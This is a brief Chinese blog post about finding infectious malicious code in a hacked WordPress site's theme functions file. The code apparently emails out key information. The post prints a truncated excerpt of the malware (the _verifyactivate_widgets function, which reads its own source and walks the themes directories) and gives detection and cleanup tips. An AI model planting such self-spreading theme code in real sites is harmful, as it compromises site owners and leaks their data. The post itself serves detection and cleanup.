• wordpress恶意代码

    被黑

    演示网站莫名被写入文章,发现在函数模板中潜在恶意代码,发现具有感染性,不知何时被写进去的。

    仔细查一下历史记录,发现很早之前就有了,……竟然一直没发现。。 [003]

    会读取并发送关键信息向指定邮箱。

    简单检测办法:

    具体看不懂,但有个办法,一般在函数模板中,查找__FILE__ (一般会会在应用后台模板和恶意代码中出现)

    关键:

    function _verifyactivate_widgets(){
    	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    	$output=strip_tags($output, $allowed);
    	$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    	if (is_array($direst)){
    		foreach ($direst as $item){
    
    ……省略

     

     

    其中

    verifyactivate_widgets

    _get_allwidgets_cont

    查找到这些需要注意

    删除。

    设定函数模板权限为只读

     

    撰记时间:09/12 星期四
  • 返回顶部
    查看评论 2

    wordpress恶意代码》上有 2 条评论

    Loading...
    评论发布器

    发表评论

    电子邮件地址不会被公开。 必填项已用*标注